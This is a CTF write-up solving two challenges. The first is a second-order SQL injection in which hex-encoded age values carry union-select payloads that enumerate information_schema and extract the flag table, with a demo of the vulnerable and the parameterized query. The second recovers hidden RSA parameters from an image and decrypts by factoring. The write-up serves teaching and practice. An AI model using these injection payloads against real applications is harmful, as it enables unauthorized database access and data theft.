TSCTF Misc&Web writeup

Buy Flag

This challenge is almost identical to the "Three hit" challenge from today's 强网杯 (QWB CTF). It is a second-order injection: when a user registers, their age is stored in the database, and after a successful login the index.php page queries the database for usernames that have the same age.

Second-order injection: it stems from developers trusting the data in the database too much. Whenever user-supplied data is read back out of the database and used without any processing, a second-order injection can be triggered.

When I first started on this challenge, I looked at the HTML source and found:

    function BuyFlag(){
      if(!true){
        alert('Please sign in first!');
      }
      else if(18>18){
        alert('You are too old to buy it!');
      }
      else {
        alert('Amazing, maybe, i said maybe, you can bug it!');
      }
    }

This is easy to bypass with age=18, but that turns out to be of no use...

I found that age had to be numeric. This can be bypassed with hex encoding (a hex literal such as 0x3127 passes the numeric check, but MySQL treats it as the string 1'), so I started the following testing process.

Test process:

  • Determined it is a "string-type" injection

    1' i.e. age=0x3127: registration succeeded, login succeeded & page displayed abnormally

    1'# i.e. age=0x312723: registration succeeded, login succeeded & page displayed normally

  • Finding the injection point

    This step was actually discovered by chance while poking around at random, haha... it turned out that the content returned here is not fixed:

    1' and 1=2#

  • Determining the number of columns
    1' order by 1# normal
    1' order by 2# abnormal
    1' and 1=2 union select 123# 123 is displayed at the injection point

  • Dumping the database

    1' and 1=2 union select database()#
    1' and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=database()# children,py_flag
    1' and 1=2 union select group_concat(column_name) from information_schema.columns where table_name='py_flag'# Id,tsctf_fla9
    1' and 1=2 union select tsctf_fla9 from py_flag# TSCTF{Simple_Sql_f0r_Y0u}
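To make the defect concrete, here is an added example (my own code, not the challenge's) that models the Buy Flag flow with an in-memory SQLite database: registration stores age with a bound parameter, and the index page later reads it back and builds a new query from it, vulnerable and fixed side by side. SQLite uses -- rather than MySQL's # for comments and the MySQL hex-literal trick is not modelled, so the constructed age value is stored as a plain string; the names py_flag and tsctf_fla9 come from the writeup, while the flag value and user names are placeholders.

```python
import sqlite3

# Constructed demo of the Buy Flag second-order injection (not the challenge's
# code). Table/column names py_flag and tsctf_fla9 are from the writeup; the
# flag value and user names are placeholders.
VULN_LOOKUP = "SELECT username FROM users WHERE age = '{}'"
SAFE_LOOKUP = "SELECT username FROM users WHERE age = ?"


def setup_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (username TEXT, age TEXT);
        CREATE TABLE py_flag (Id INTEGER, tsctf_fla9 TEXT);
        INSERT INTO users VALUES ('alice', '18');
        INSERT INTO py_flag VALUES (1, 'FLAG{placeholder}');
    """)
    return con


def register(con, username, age):
    # First use of the value: bound as a parameter, so it is stored verbatim
    # and nothing is injected at this step. (In the challenge the value got
    # past the numeric check as a MySQL hex literal.)
    con.execute("INSERT INTO users VALUES (?, ?)", (username, age))


def same_age_users(con, username, safe):
    # Second use: index.php reads the stored age back and uses it in a fresh
    # query. Trusting it because it "came from the database" is the defect;
    # the fix is to bind it exactly as the INSERT did.
    (age,) = con.execute("SELECT age FROM users WHERE username = ?",
                         (username,)).fetchone()
    if safe:
        rows = con.execute(SAFE_LOOKUP, (age,))
    else:
        rows = con.execute(VULN_LOOKUP.format(age))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = setup_db()
    # SQLite comment syntax is --, where the writeup's MySQL payloads used #
    register(db, "tester", "1' UNION SELECT tsctf_fla9 FROM py_flag --")
    print(same_age_users(db, "tester", safe=False))  # leaks the py_flag row
    print(same_age_users(db, "tester", safe=True))   # only the literal match
```

With the bound parameter the stored string only ever matches itself, so the second query returns the registering user and nothing from py_flag.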

Simple RSA

Opening the image in 010 Editor reveals the hidden RSA parameters:

    n=52A99E249EE7CF3C0CBF963A009661772BC9CDF6E1E3FBFC6E44A07A5E0F894457A9F81C3AE132AC5683D35B28BA5C324243
    decimal=833810193564967701912362955539789451139872863794534923259743419423089229206473091408403560311191545764221310666338878019

    e=010001
    =>65537

    cipher=18228DF578DAD6DC893CBCD95BD934D28F26C820778E7AFEB6B3BE38FD5298E497FAF8CEAA78C613E5F5FADD4BD5E50FD8A5
    => 243447443751973982528567424728988076363119997637875514835555154791673477824856681065818912755263077705578942115259340965

With n, e and cipher known, recover the plaintext by factoring n, either with the online service http://factordb.com/ (note: the input must be in decimal) or with the tool yafu:

    p = 863653476616376575308866344984576466644942572246900013156919
    q = 965445304326998194798282228842484732438457170595999523426901

With p, q, e and c known, compute the plaintext:

    # coding = utf-8
    # Extended Euclid gives (x, y, r) with fn*x + e*y = r = gcd(fn, e) = 1,
    # so y is the inverse of e modulo fn, i.e. the private exponent d.
    def computeD(fn, e):
        (x, y, r) = extendedGCD(fn, e)
        # y may be < 0, so lift it into the range [0, fn)
        if y < 0:
            return fn + y
        return y

    def extendedGCD(a, b):
        # invariant: a*xi + b*yi = ri
        if b == 0:
            return (1, 0, a)
        # a*x1 + b*y1 = a
        x1 = 1
        y1 = 0
        # a*x2 + b*y2 = b
        x2 = 0
        y2 = 1
        while b != 0:
            q = a // b  # integer division (the original relied on Python 2's /)
            # ri = r(i-2) % r(i-1)
            r = a % b
            a = b
            b = r
            # xi = x(i-2) - q*x(i-1)
            x = x1 - q*x2
            x1 = x2
            x2 = x
            # yi = y(i-2) - q*y(i-1)
            y = y1 - q*y2
            y1 = y2
            y2 = y
        return (x1, y1, a)

    p = 863653476616376575308866344984576466644942572246900013156919
    q = 965445304326998194798282228842484732438457170595999523426901
    e = 65537
    c = 0x18228DF578DAD6DC893CBCD95BD934D28F26C820778E7AFEB6B3BE38FD5298E497FAF8CEAA78C613E5F5FADD4BD5E50FD8A5

    n = p * q
    fn = (p - 1) * (q - 1)

    d = computeD(fn, e)
    m = pow(c, d, n)
    # interpret the plaintext integer as big-endian bytes (Python 3; the
    # original used Python 2's hex(m)[2:-1].decode('hex'))
    print(m.to_bytes((m.bit_length() + 7) // 8, 'big').decode())

flag: TSCTF{ez_rsa_real_ez~}

Personal thoughts:

  • Base conversions of all kinds, especially with very long numbers: I will never trust online conversion sites again!!!